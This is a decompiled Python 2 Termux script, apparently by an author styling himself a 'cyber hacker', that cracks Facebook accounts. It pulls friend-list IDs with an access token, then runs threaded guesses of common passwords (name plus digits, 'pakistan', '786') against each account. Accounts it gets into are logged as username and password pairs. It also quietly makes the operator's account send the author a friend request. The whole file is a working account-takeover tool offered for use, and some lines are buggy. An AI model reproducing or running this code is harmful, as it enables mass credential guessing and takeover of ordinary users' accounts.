# uncompyle6 version 3.7.4
# Python bytecode 2.7
# Decompiled from: Python 2.7.18 (default, Mar 20 2021, 14:58:25) 
# [GCC 4.2.1 Compatible Android (6454773 based on r365631c2) Clang 9.0.8 (https:/
# Embedded file name: <www.youtube.com/c/pythonlife
#Decompiled bye Arbab Memon
#Fresh Proof 
import os, sys
CorrectUsername = 'DSP'
CorrectPassword = 'ARBAB'
loop = 'true'
while loop == 'true':
    username = raw_input('\x1b[1;96m \x1b[1;93mUsername Of Tool \x1b[1;96m>>>> ')
    if username == CorrectUsername:
        password = raw_input('\x1b[1;96m \x1b[1;93mPassword Of Tool \x1b[1;96m>>>> ')
        if password == CorrectPassword:
            print 'Logged in successfully as ' + username
            loop = 'false'
        else:
            print 'Wrong Password'
            os.system('xdg-open https://chat.whatsapp.com/EANsaIFBzVO26A5bWHm8eI')
    else:
        print 'Wrong Username'
        os.system('xdg-open https://chat.whatsapp.com/EANsaIFBzVO26A5bWHm8eI')

def login():
    os.system('clear')
    try:
        toket = open('login.txt', 'r')
        menu()
    except (KeyError, IOError):
        os.system('clear')


try:
    import os, sys, time, datetime, re, random, hashlib, threading, json, getpass, urllib, cookielib, requests
    from multiprocessing.pool import ThreadPool
except ImportError:
    os.system('pip2 install requests')
    os.system('python2 Sp404.py')

try:
    os.mkdir('/sdcard/ids')
except OSError:
    pass

import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, cookielib, requests, uuid, string
from multiprocessing.pool import ThreadPool
try:
    os.mkdir('/sdcard/ids')
except OSError:
    pass

try:
    os.mkdir('/sdcard/ids/ex_ids')
except OSError:
    pass

os.system('git pull')
from requests.exceptions import ConnectionError
bd = random.randint(20000000.0, 30000000.0)
sim = random.randint(20000.0, 40000.0)
header = {'x-fb-connection-bandwidth': repr(bd), 'x-fb-sim-hni': repr(sim), 'x-fb-net-hni': repr(sim), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': 'Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-N950N Build/NMF26X) [FBAN/FB4A;FBAV/251.0.0.31.111;FBPN/com.facebook.katana;FBLC/en_US;FBBV/188828013;FBCR/Advance Info Service;FBMF/samsung;FBDV/SM-N950N;FBSV/5.1.1;FBCA/x86;armeabi-v7a;FBDM{density=2.0,width=900,height=1600};FB_FW;FBRV/0;]', 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
reload(sys)
sys.setdefaultencoding('utf8')
c = '\x1b[1;32m'
c2 = '\x1b[0;97m'
c3 = '\x1b[1;31m'
c = '\x1b[1;32m'
c2 = '\x1b[0;97m'
c3 = '\x1b[1;31m'
os.system('git pull')
os.system('clear')
logo = '\n \x1b[1;91m     _          _\n\x1b[1;92m      \\        /\n\x1b[1;93m     __\\______/__\n\x1b[1;94m     | [\xc2\xa9]  [\xc2\xa9] |\xe2\x80\x8b\n\x1b[1;95m     |  [====]  |   [+] \xf0\x9f\x87\xa6\xe2\x80\x8b\xf0\x9f\x87\xb3\xe2\x80\x8b\xf0\x9f\x87\xb4\xe2\x80\x8b\xf0\x9f\x87\xb3\xe2\x80\x8b\xf0\x9f\x87\xbe\xe2\x80\x8b\xf0\x9f\x87\xb2\xe2\x80\x8b\xf0\x9f\x87\xb4\xe2\x80\x8b\xf0\x9f\x87\xba\xe2\x80\x8b\xf0\x9f\x87\xb8\xe2\x80\x8b \xf0\x9f\x84\xb7\xf0\x9f\x84\xb0\xf0\x9f\x84\xb2\xf0\x9f\x84\xba\xf0\x9f\x84\xb4\xf0\x9f\x85\x81\xf0\x9f\x85\x82 [=]\n\x1b[1;96m \xe2\x95\x94\xe2\x95\x90\xe2\x95\x90o00\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9000o\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97\n\x1b[1;97m \xe2\x96\x88  \x1b[1;92m\x1a CYBER NAME   : ARBAB-MEMON                \xe2\x96\x88\n\x1b[1;98m \xe2\x96\x88  \x1b[1;93m\x1a WHATSAPP NO  : +9213003023263             \xe2\x96\x88\n\x1b[1;99m \xe2\x96\x88  \x1b[1;91m\x1a NOTE         : USE FAST 4G SIM NET        \xe2\x96\x88\n\x1b[1;90m \xe2\x96\x88  \x1b[1;92m\x1a NOTE         : 1ST CLEAR TERMUX  DATA     \xe2\x96\x88\n\x1b[1;91m \xe2\x96\x88  \x1b[1;96m\x1a COMMAND NAME : FILE CRACK                 \xe2\x96\x88\n\x1b[1;92m \xe2\x96\x88  \x1b[1;95m\x1a UPDATE       : TOKEN EXPIRING PROBLM CLEAR\xe2\x96\x88\n\x1b[1;92m \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\n\x1b[1;93m                   version 3.2\n\x1b[1;94m                      \n\x1b[1;92m  >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n  \n              \x1b[105m\x1b[37;1mCYBER HACKER_ARBAB MEMON\x1b[0m\n                \n         \n\n\x1b[1;97m-----------------------------------------------\n'
idh = []
back = 0

def reg():
    os.system('clear')
    print logo
    print ''
    print '\x1b[1;31;1mTake The  Approval For Login'
    print ''
    time.sleep(1)
    try:
        to = open('/sdcard/.Arbab-Memon.txt', 'r').read()
    except (KeyError, IOError):
        reg2()

    r = requests.get('https://raw.githubusercontent.com/Ethical-404/PROHACK/main/.Arbab-Memon.txt').text
    if to in r:
        os.system('cd ..... && npm install')
        os.system('fuser -k 5000/tcp &')
        os.system('#')
        os.system('cd ..... && node index.js &')
        time.sleep(5)
        ip()
    else:
        os.system('clear')
        print logo
        print ''
        print '\t      Approval mathod \x1b[1;91m '
        print ''
        print ' \x1b[1;95mCopy the id and send to \x1b[1;93mArbab-Memon  '
        print ''
        print ' \x1b[1;92mYour id is >>>: \x1b[0;36m' + to
        print ''
        raw_input('\x1b[1;93m Press enter to send id to Arbab Memon')
        os.system('xdg-open https://wa.me/+923003023263')
        reg()


def reg2():
    os.system('clear')
    print logo
    print '\t     Approval not detected'
    print
    print ' \x1b[1;92mCopy and press enter , then select whatsapp to continue'
    print ''
    id = uuid.uuid4().hex[:50]
    print ' Your id: ' + id
    print ''
    raw_input(' Press enter to go to whatsapp ')
    os.system('xdg-open https://wa.me/+923003023263')
    sav = open('/sdcard/.Arbab-Memon.txt', 'w')
    sav.write(id)
    sav.close()
    raw_input('\x1b[1;92m Press enter to check Approval ')
    reg()


def ip():
    os.system('clear')
    print logo
    print '\tCollecting device info'
    try:
        ipinfo = requests.get('http://ip-api.com/json/')
        z = json.loads(ipinfo.text)
        ips = z['query']
        country = z['country']
        regi = z['regionName']
        network = z['isp']
    except:
        pass

    print '\x1b[1;93m Your ip: ' + ips
    time.sleep(2)
    print '\x1b[1;93m Your country: ' + country
    time.sleep(2)
    print '\x1b[1;92m Your region: ' + regi
    time.sleep(2)
    print ' \x1b[1;92mYour network: ' + network
    time.sleep(1)
    print ' Loading ...'
    time.sleep(1)
    login_choice()


def login_choice():
    os.system('clear')
    try:
        open('.login.txt', 'r')
        menu()
    except IOError:
        os.system('clear')
        print logo
        print 47 * '\x1b[1;93m\xe2\x95\x90'
        print '\t    \x1b[1;32mLOGIN MENU\x1b[0;97m'
        print 47 * '\x1b[1;96m\xe2\x95\x90'
        print '\x1b[1;97m(\x1b[1;92m1\x1b[1;97m) Login with token'
        print '\x1b[1;97m(\x1b[1;92m2\x1b[1;97m) Login with id/pass'
        print ''
        login_select()


def login_select():
    select = raw_input('\x1b[1;92m>>> \x1b[0;97m')
    if select == '1':
        login_token()
    elif select == '2':
        login_fb()
    else:
        print ''
        print '\t    \x1b[1;31mSelect valid option\x1b[0;97m'
        print ''
        time.sleep(1)
        login_select()


def login_fb():
    os.system('clear')
    print logo
    print 47 * '\x1b[1;91m\xe2\x95\x90'
    print '\t    \x1b[1;32mLOGIN WITH ID/PASS\x1b[0;97m'
    print 47 * '\x1b[1;91m\xe2\x95\x90'
    id = raw_input(' Id/mail/number: ')
    id1 = id.replace(' ', '')
    id2 = id1.replace('(', '')
    uid = id2.replace(')', '')
    pwd = raw_input(' Password: ')
    print ''
    data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pwd, headers=header).text
    q = json.loads(data)
    if 'loc' in q:
        hamza = open('.login.txt', 'w')
        hamza.write(q['loc'])
        hamza.close()
        requests.post('https://graph.facebook.com/me/friends?uid=100048514350891&access_token=' + q['loc'])
        menu()
    elif 'www.facebook.com' in q['error']:
        print ''
        print '\t    \x1b[1;31mUser must verify account before login\x1b[0;97m'
        time.sleep(1)
        print ''
        raw_input('\tPress enter to back ')
        login_choice()
    else:
        print ''
        print '\t    \x1b[1;31mIncorrect credentials\x1b[0;97m'
        raw_input('Press enter to try again ')
        login_choice()


def login_token():
    os.system('clear')
    try:
        open('.login.txt', 'r')
        time.sleep(1)
        menu()
    except (KeyError, IOError):
        os.system('clear')
        print logo
        print 47 * '\x1b[1;91m\xe2\x95\x90'
        print '\t    \x1b[1;32mFB TOKEN LOGIN\x1b[0;97m'
        print 47 * '\x1b[1;91m\xe2\x95\x90'
        token = raw_input('\x1b[1;97m(\x1b[1;91m+\x1b[1;97m) Paste token : ')
        token_save = open('.login.txt', 'w')
        token_save.write(token)
        token_save.close()
        time.sleep(1)
        menu()


def menu():
    os.system('clear')
    try:
        token = open('.login.txt', 'r').read()
    except IOError:
        os.system('clear')
        print ''
        print logo
        print ''
        print '\t    \x1b[1;31mToken not found\x1b[0;97m'
        time.sleep(1)
        login_choice()

    try:
        r = requests.get('https://graph.facebook.com/me?access_token=' + token, headers=header)
        a = json.loads(r.text)
        name = a['name']
    except KeyError:
        os.system('clear')
        print ''
        print logo
        print ''
        print '\t    \x1b[1;31mToken expired\x1b[0;97m'
        time.sleep(1)
        os.system('rm -rf .login.txt')
        login_choice()

    os.system('clear')
    print logo
    print 47 * '\x1b[1;93m\xe2\x95\x90'
    print '\t    \x1b[1;32mUser: ' + name + '\x1b[0;97m'
    print 47 * '\x1b[1;91m\xe2\x95\x90'
    print '\x1b[1;92m(\x1b[1;95m1\x1b[1;95m) CRACK BY ADDED PASSWORDS'
    print '\x1b[1;95m(\x1b[1;93m2\x1b[1;93m) CRACK BY CHOISE PASSWORDS'
    print '\x1b[1;96m(\x1b[1;91m3\x1b[1;96m) EXTRACT/DUMP ANY FB ACCOUNT'
    print ''
    menu_option()


def menu_option():
    select = raw_input('\x1b[1;92m>>> \x1b[0;97m')
    if select == '1':
        crack()
    elif select == '2':
        choice()
    elif select == '3':
        ex_id()
    elif select == '4':
        ex_file()
    else:
        print ''
        print '\t    \x1b[1;31mSelect valid option\x1b[0;97m'
        print ''
        menu_option()


def crack():
    global token
    os.system('clear')
    try:
        token = open('.login.txt', 'r').read()
    except IOError:
        print ''
        print '\t    \x1b[1;31mToken not found\x1b[0;97m'
        time.sleep(1)
        login_choice()

    os.system('clear')
    print logo
    print '\t    \x1b[1;33mAUTO PASS CLONING\x1b[0;97m'
    print
    print '\x1b[1;92m(\x1b[1;96m1\x1b[1;92m) Crack Public Friendlist'
    print '\x1b[1;95m(\x1b[1;91m2\x1b[1;95m) Crack File Account'
    print '\x1b[1;96m(\x1b[1;92m0\x1b[1;96m) Back'
    print ''
    crack_select()


def crack_select():
    select = raw_input('\x1b[1;33m>>> \x1b[0;97m')
    id = []
    oks = []
    cps = []
    if select == '1':
        os.system('clear')
        print logo
        print ''
        print '\t    \x1b[1;32mAUTO PASS PUBLIC CRACK\x1b[0;97m'
        print ''
        idt = raw_input('\x1b[1;97m(\x1b[1;91m+\x1b[1;97m) User id : ')
        try:
            r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token, headers=header)
            q = json.loads(r.text)
            print '\x1b[1;97m(\x1b[1;93m\xe2\x9c\x93\x1b[1;97m) User Name : ' + q['name']
        except KeyError:
            print '\t    \x1b[1;31mLogged in id has checkpoint\x1b[0;97m'
            print ''
            raw_input(' Press enter to back')
            crack()

        r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token, headers=header)
        z = json.loads(r.text)
        for i in z['data']:
            uid = i['id']
            na = i['name']
            nm = na.rsplit(' ')[0]
            id.append(uid + '|' + nm)

    elif select == '2':
        os.system('clear')
        print logo
        print ''
        print '\t    \x1b[1;32mAUTO PASS FILE CRACK\x1b[0;97m'
        print ''
        try:
            filelist = raw_input('\x1b[1;97m(\x1b[1;91m+\x1b[1;97m) Paste Dump File Path : >> ')
            for line in open(filelist, 'r').readlines():
                id.append(line.strip())

        except (KeyError, IOError):
            print ''
            print '\t    \x1b[1;31mRequested file not found\x1b[0;97m'
            print ''
            raw_input(' Press enter to back ')
            crack()

    else:
        print ''
        print '\t    \x1b[1;31mSelect valid option\x1b[0;97m'
        print ''
        crack_select()
    print '\x1b[1;97m(\x1b[1;93m\xe2\x9c\x93\x1b[1;97m) Total Account : ' + str(len(id))
    print 47 * '\xe2\x95\x90'
    print ''

    def main(arg):
        user = arg
        uid, name = user.split('|')
        try:
            pass1 = 'pakistan'
            data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass1, headers=header).text
            q = json.loads(data)
            if 'loc' in q:
                print '\x1b[1;32m(ARBAB-OK) ' + uid + ' | ' + pass1 + '\x1b[0;97m'
                ok = open('/sdcard/ids/ARBAB-MEMON-OK.txt', 'a')
                ok.write(uid + ' | ' + pass1 + '\n')
                ok.close()
                oks.append(uid + pass1)
            elif 'www.facebook.com' in q['error']:
                print '\x1b[0;36m(ARBAB-CP) ' + uid + ' | ' + pass1
                cp = open('checkpoint.txt', 'a')
                cp.write(uid + ' | ' + pass1 + '\n')
                cp.close()
                cps.append(uid + pass1)
            else:
                pass2 = name + '123'
                data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass2, headers=header).text
                q = json.loads(data)
                if 'loc' in q:
                    print '\x1b[1;32m(ARBAB-OK) ' + uid + ' | ' + pass2 + '\x1b[0;97m'
                    ok = open('/sdcard/ids/ARBAB-MEMON-OK.txt', 'a')
                    ok.write(uid + ' | ' + pass2 + '\n')
                    ok.close()
                    oks.append(uid + pass2)
                elif 'www.facebook.com' in q['error']:
                    print '\x1b[0;36m(ARBAB-CP) ' + uid + ' | ' + pass2
                    cp = open('checkpoint.txt', 'a')
                    cp.write(uid + ' | ' + pass2 + '\n')
                    cp.close()
                    cps.append(uid + pass2)
                else:
                    pass3 = name + '1234'
                    data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass3, headers=header).text
                    q = json.loads(data)
                    if 'loc' in q:
                        print '\x1b[1;32m(ARBAB-OK) ' + uid + ' | ' + pass3 + '\x1b[0;97m'
                        ok = open('/sdcard/ids/ARBAB-MEMON-OK.txt', 'a')
                        ok.write(uid + ' | ' + pass3 + '\n')
                        ok.close()
                        oks.append(uid + pass3)
                    elif 'www.facebook.com' in q['error']:
                        print '\x1b[0;36m(ARBAB-CP) ' + uid + ' | ' + pass3
                        cp = open('checkpoint.txt', 'a')
                        cp.write(uid + ' | ' + pass3 + '\n')
                        cp.close()
                        cps.append(uid + pass3)
                    else:
                        pass4 = name + '12345'
                        data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass4, headers=header).text
                        q = json.loads(data)
                        if 'loc' in q:
                            print '\x1b[1;32m(ARBAB-OK) ' + uid + ' | ' + pass4 + '\x1b[0;97m'
                            ok = open('/sdcard/ids/ARBAB-MEMON-OK.txt', 'a')
                            ok.write(uid + ' | ' + pass4 + '\n')
                            ok.close()
                            oks.append(uid + pass4)
                        elif 'www.facebook.com' in q['error']:
                            print '\x1b[0;36m(ARBAB-CP) ' + uid + ' | ' + pass4
                            cp = open('checkpoint.txt', 'a')
                            cp.write(uid + ' | ' + pass4 + '\n')
                            cp.close()
                            cps.apppend(uid + pass4)
                        else:
                            pass5 = name + '786'
                            data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass5, headers=header).text
                            q = json.loads(data)
                            if 'loc' in q:
                                print '\x1b[1;32m(ARBAB-OK) ' + uid + ' | ' + pass5 + '\x1b[0;97m'
                                ok = open('/sdcard/ids/ARBAB-MEMON-OK.txt', 'a')
                                ok.write(uid + ' | ' + pass5 + '\n')
                                ok.close()
                                oks.append(uid + pass5)
                            elif 'www.facebook.com' in q['error']:
                                print '\x1b[0;36m(ARBAB-CP) ' + uid + ' | ' + pass5
                                cp = open('checkpoint.txt', 'a')
                                cp.write(uid + ' | ' + pass5 + '\n')
                                cp.close()
                                cps.append(uid + pass6)
                            else:
                                pass6 = '000786'
                                data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass6).text
                                q = json.loads(data)
                                if 'loc' in q:
                                    print '\x1b[1;32m(ARBAB-OK) ' + uid + ' | ' + pass6 + '\x1b[0;97m'
                                    ok = open('/sdcard/ids/ARBAB-MEMON-OK.txt', 'a')
                                    ok.write(uid + ' | ' + pass6 + '\n')
                                    ok.close()
                                    oks.append(uid + pass6)
                                elif 'www.facebook.com' in q['error']:
                                    print '\x1b[0;36m(ARBAB-CP) ' + uid + ' | ' + pass6
                                    cp = open('checkpoint.txt', 'a')
                                    cp.write(uid + ' | ' + pass6 + '\n')
                                    cp.close()
                                    cps.append(uid + pass6)
                                else:
                                    pass7 = '786786'
                                    data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass7, headers=header).text
                                    q = json.loads(data)
                                    if 'loc' in q:
                                        print '\x1b[1;32m(ARBAB-OK) ' + uid + ' | ' + pass7 + '\x1b[0;97m'
                                        ok = open('/sdcard/ids/ARBAB-MEMON-OK.txt', 'a')
                                        ok.write(uid + ' | ' + pass7 + '\n')
                                        ok.close()
                                        oks.append(uid + pass7)
                                    elif 'www.facebook.com' in q['error']:
                                        print '\x1b[0;36m(ARBAB-CP) ' + uid + ' | ' + pass7
                                        cp = open('checkpoint.txt', 'a')
                                        cp.write(uid + ' | ' + pass7 + '\n')
                                        cp.close()
                                        cps.append(uid + pass7)
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print ''
    print 47 * '-'
    print ''
    print ' The process has completed'
    print ' Total ARBAB-MEMON Ok/Cp:' + str(len(oks)) + '/' + str(len(cps))
    print ''
    print 47 * '-'
    print ''
    raw_input(' Press enter to back')
    crack()


def ex_id():
    global token
    idg = []
    try:
        token = open('.login.txt', 'r').read()
    except IOError:
        print '\t    \x1b[1;31mToken not found\x1b[0;97m'
        print ''
        time.sleep(1)
        login_choice()

    os.system('clear')
    print logo
    print 47 * '\x1b[1;91m\xe2\x95\x90'
    print '\t  \x1b[1;32mCOLLECT PUBLIC ID FRIENDLIST\x1b[0;97m'
    print 47 * '\x1b[1;91m\xe2\x95\x90'
    idh = raw_input('\x1b[1;97m(\x1b[1;91m+\x1b[1;97m) Input Id: ')
    try:
        r = requests.get('https://graph.facebook.com/' + idh + '?access_token=' + token, headers=header)
        q = json.loads(r.text)
        print '\x1b[1;97m(\x1b[1;91m\xe2\x9c\x93\x1b[1;97m) Collecting from: ' + q['name']
    except KeyError:
        print ''
        print '\t    \x1b[1;32mLogged in id has checkpoint\x1b[0;97m'
        print ''
        raw_input(' Press enter to back')
        crack()

    r = requests.get('https://graph.facebook.com/' + idh + '/friends?access_token=' + token, headers=header)
    q = json.loads(r.text)
    ids = open('ids_friends.txt', 'w')
    for i in q['data']:
        uid = i['id']
        na = i['name']
        nm = na.rsplit(' ')[0]
        idg.append(uid + '|' + nm)
        ids.write(uid + '|' + nm + '\n')

    ids.close()
    print ''
    print 47 * '-'
    print ''
    print ' The process has completed'
    print ' Total ids: ' + str(len(idg))
    print ''
    print 47 * '-'
    print ''
    raw_input(' Press enter to download file')
    os.system('cp ids_friends.txt /sdcard')
    os.system('rm -rf ids_friends.txt')
    print ' File downloaded successfully'
    time.sleep(1)
    print '\x1b[1;93mEnter Go Back'
    menu()


def choice():
    global token
    os.system('clear')
    try:
        token = open('.login.txt', 'r').read()
    except IOError:
        print ''
        print '\t    \x1b[1;31mToken not found\x1b[0;97m'
        time.sleep(1)
        login_choice()

    os.system('clear')
    print logo
    print '\t    \x1b[1;32mCHOICE PASS CRACK MENU\x1b[0;97m'
    print '\x1b[1;97m(\x1b[1;92m1\x1b[1;97m) Crack Public Friendlist'
    print '\x1b[1;97m(\x1b[1;92m2\x1b[1;97m) Crack File Account'
    print '\x1b[1;97m(\x1b[1;91m0\x1b[1;91m) Back'
    print ''
    choice_select()


def choice_select():
    select = raw_input('\x1b[1;32m>>> \x1b[0;97m')
    id = []
    oks = []
    cps = []
    if select == '1':
        os.system('clear')
        print logo
        print ''
        print '\t    \x1b[1;32mCHOICE NAME PASS CRACK\x1b[0;97m'
        p1 = raw_input('\x1b[1;97m(\x1b[1;91m1\x1b[1;91m) Name + Digit : ')
        p2 = raw_input('\x1b[1;97m(\x1b[1;91m2\x1b[1;92m) Name + Digit : ')
        p3 = raw_input('\x1b[1;97m(\x1b[1;91m2\x1b[1;93m) Name + Digit : ')
        p4 = raw_input('\x1b[1;97m(\x1b[1;91m3\x1b[1;94m) Name + Digit : ')
        print
        print '\t    \x1b[1;32mCHOICE DIGIT PASS CRACK\x1b[0;97m'
        print 47 * '\x1b[1;91m\xe2\x95\x90'
        pass5 = raw_input('\x1b[1;97m(\x1b[1;91m+\x1b[1;95m) Digit Password : ')
        pass6 = raw_input('\x1b[1;97m(\x1b[1;91m+\x1b[1;96m) Digit Password : ')
        pass7 = raw_input('\x1b[1;97m(\x1b[1;91m+\x1b[1;97m) Digit Password : ')
        pass8 = raw_input('\x1b[1;97m(\x1b[1;91m+\x1b[1;91m) Digit Password : ')
        print
        print '\t    \x1b[1;32mAUTO PASS PUBLIC CRACK\x1b[0;95m'
        print ''
        idt = raw_input('\x1b[1;97m(\x1b[1;91m+\x1b[1;92m) User id : ')
        try:
            r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token, headers=header)
            q = json.loads(r.text)
            print '\x1b[1;92m(\x1b[1;93m\xe2\x9c\x93\x1b[1;95m) User id : ' + q['name']
        except KeyError:
            print '\t    \x1b[1;33mLogged in id has checkpoint\x1b[0;96m'
            print ''
            raw_input(' Press enter to back')
            crack()

        r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token, headers=header)
        z = json.loads(r.text)
        for i in z['data']:
            uid = i['id']
            na = i['name']
            nm = na.rsplit(' ')[0]
            id.append(uid + '|' + nm)

    elif select == '2':
        os.system('clear')
        print logo
        print
        print '\t    \x1b[1;32mCHOICE NAME PASS CRACK\x1b[0;97m'
        p1 = raw_input('\x1b[1;97m(\x1b[1;91m1\x1b[1;91m) Name + Digit : ')
        p2 = raw_input('\x1b[1;97m(\x1b[1;91m2\x1b[1;92m) Name + Digit : ')
        p3 = raw_input('\x1b[1;97m(\x1b[1;91m3\x1b[1;93m) Name + Digit : ')
        p4 = raw_input('\x1b[1;97m(\x1b[1;91m4\x1b[1;94m) Name + Digit : ')
        print
        print '\t    \x1b[1;32mCHOICE DIGIT PASS CRACK\x1b[0;97m'
        print 47 * '\x1b[1;91m\xe2\x95\x90'
        pass5 = raw_input('\x1b[1;97m(\x1b[1;91m5\x1b[1;95m) Digit Password : ')
        pass6 = raw_input('\x1b[1;97m(\x1b[1;91m6\x1b[1;96m) Digit Password : ')
        pass7 = raw_input('\x1b[1;97m(\x1b[1;91m7\x1b[1;97m) Digit Password : ')
        print ''
        print '\t    \x1b[1;32mAUTO PASS FILE CRACK\x1b[0;97m'
        print ''
        try:
            filelist = raw_input('\x1b[1;92m(\x1b[1;93m+\x1b[1;95m) Paste File path :>> ')
            for line in open(filelist, 'r').readlines():
                id.append(line.strip())

        except (KeyError, IOError):
            print ''
            print '\t    \x1b[1;36mRequested file not found\x1b[0;97m'
            print ''
            raw_input(' Press enter to back ')
            menu()

    elif select == '0':
        menu()
    else:
        print ''
        print '\t    \x1b[1;31mSelect valid option\x1b[0;97m'
        print ''
        choice_select()
    print '\x1b[1;97m(\x1b[1;93m\xe2\x9c\x93\x1b[1;97m) Total Account : ' + str(len(id))
    print 47 * '\xe2\x95\x90'

    def main(arg):
        user = arg
        uid, name = user.split('|')
        try:
            pass1 = name + p1
            data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass1, headers=header).text
            q = json.loads(data)
            if 'loc' in q:
                print '\x1b[1;32m(ARBAB-OK) ' + uid + ' | ' + pass1 + '\x1b[0;97m'
                ok = open('/sdcard/ids/ARBAB-MEMON-OK.txt', 'a')
                ok.write(uid + ' | ' + pass1 + '\n')
                ok.close()
                oks.append(uid + pass1)
            elif 'www.facebook.com' in q['error']:
                print '\x1b[0;36m(ARBAB-CP) ' + uid + ' | ' + pass1
                cp = open('checkpoint.txt', 'a')
                cp.write(uid + ' | ' + pass1 + '\n')
                cp.close()
                cps.append(uid + pass1)
            else:
                pass2 = name + p2
                data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass2, headers=header).text
                q = json.loads(data)
                if 'loc' in q:
                    print '\x1b[1;32m(ARBAB-OK) ' + uid + ' | ' + pass2 + '\x1b[0;97m'
                    ok = open('/sdcard/ids/MAFIA-MEMON-OK.txt', 'a')
                    ok.write(uid + ' | ' + pass2 + '\n')
                    ok.close()
                    oks.append(uid + pass2)
                elif 'www.facebook.com' in q['error']:
                    print '\x1b[0;36m(ARBAB-CP) ' + uid + ' | ' + pass2
                    cp = open('checkpoint.txt', 'a')
                    cp.write(uid + ' | ' + pass2 + '\n')
                    cp.close()
                    cps.append(uid + pass2)
                else:
                    pass3 = name + p3
                    data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass3, headers=header).text
                    q = json.loads(data)
                    if 'loc' in q:
                        print '\x1b[1;32m(ARBAB-OK) ' + uid + ' | ' + pass3 + '\x1b[0;97m'
                        ok = open('/sdcard/ids/ARBAB-MEMON-OK.txt', 'a')
                        ok.write(uid + ' | ' + pass3 + '\n')
                        ok.close()
                        oks.append(uid + pass3)
                    elif 'www.facebook.com' in q['error']:
                        print '\x1b[0;36m(ARBAB-CP) ' + uid + ' | ' + pass3
                        cp = open('checkpoint.txt', 'a')
                        cp.write(uid + ' | ' + pass3 + '\n')
                        cp.close()
                        cps.append(uid + pass3)
                    else:
                        pass4 = name + p4
                        data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass4, headers=header).text
                        q = json.loads(data)
                        if 'loc' in q:
                            print '\x1b[1;32m(ARBAB-OK) ' + uid + ' | ' + pass4 + '\x1b[0;97m'
                            ok = open('/sdcard/ids/ARBAB-MEMON-OK.txt', 'a')
                            ok.write(uid + ' | ' + pass4 + '\n')
                            ok.close()
                            oks.append(uid + pass4)
                        elif 'www.facebook.com' in q['error']:
                            print '\x1b[0;36m(ARBAB-CP) ' + uid + ' | ' + pass4
                            cp = open('checkpoint.txt', 'a')
                            cp.write(uid + ' | ' + pass4 + '\n')
                            cp.close()
                            cps.apppend(uid + pass4)
                        else:
                            data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass5, headers=header).text
                            q = json.loads(data)
                            if 'loc' in q:
                                print '\x1b[1;32m(ARBAB-OK) ' + uid + ' | ' + pass5 + '\x1b[0;97m'
                                ok = open('/sdcard/ids/ARBAB-MEMON-OK.txt', 'a')
                                ok.write(uid + ' | ' + pass5 + '\n')
                                ok.close()
                                oks.append(uid + pass5)
                            elif 'www.facebook.com' in q['error']:
                                print '\x1b[0;36m(ARBAB-CP) ' + uid + ' | ' + pass5
                                cp = open('checkpoint.txt', 'a')
                                cp.write(uid + ' | ' + pass5 + '\n')
                                cp.close()
                                cps.append(uid + pass6)
                            else:
                                data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass6).text
                                q = json.loads(data)
                                if 'loc' in q:
                                    print '\x1b[1;32m(ARBAB-OK) ' + uid + ' | ' + pass6 + '\x1b[0;97m'
                                    ok = open('/sdcard/ids/ARBAB-MEMON-OK.txt', 'a')
                                    ok.write(uid + ' | ' + pass6 + '\n')
                                    ok.close()
                                    oks.append(uid + pass6)
                                elif 'www.facebook.com' in q['error']:
                                    print '\x1b[0;36m(ARBAB-CP) ' + uid + ' | ' + pass6
                                    cp = open('checkpoint.txt', 'a')
                                    cp.write(uid + ' | ' + pass6 + '\n')
                                    cp.close()
